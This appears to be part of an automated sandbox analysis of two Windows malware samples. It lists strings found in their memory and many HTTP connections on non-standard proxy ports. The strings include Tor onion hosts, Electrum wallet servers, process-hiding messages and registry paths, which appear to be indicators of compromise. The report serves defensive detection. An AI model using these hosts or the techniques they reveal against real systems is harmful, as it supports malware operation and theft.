                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionCommonProgramW6432=C:\Program Files\Common FilesFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerS-1-5-21-2246122658-3693405117-2476756634-1003
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.mscPROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onion
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 311c263d07362111531206573b1100053331http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionhttp://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzSELECT Name FROM Win32_VideoController
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C07C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onion
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 5088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 64579
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 8123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 51513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 41890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 8989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 9080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 26431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 13412
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 49202
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 55806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 1981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 2324
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 28040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9001 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41890 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50283 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8989 -> 50011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 36366
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 52127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 26431 -> 50070
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50334 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 24015
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50380 -> 5050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50281 -> 21605
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50397 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 57752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 3129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 64109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 1082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2324 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 35081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 9229
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 57327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50460 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 16487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50506 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 7518
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 54570
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 8082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 1983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1081 -> 50266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50442
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50494 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 15294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50651 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 30464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 88
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 10001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50587 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 55806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50727 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50709 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50506
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50599 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 32708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50747 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50635 -> 6012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50537
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50307
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 41368
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 5566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 25256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9001 -> 50404
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 50388
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50699 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50668 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50715 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50843 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 10006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 15280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50819 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50345
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 53778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 52276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 45840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 1981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 36366
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50737 -> 44268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50597
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50803 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 9375
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50777 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50921 -> 35316
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50879 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8880 -> 50489
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8880 -> 50489
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 88 -> 50566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 55005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 5003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 4145
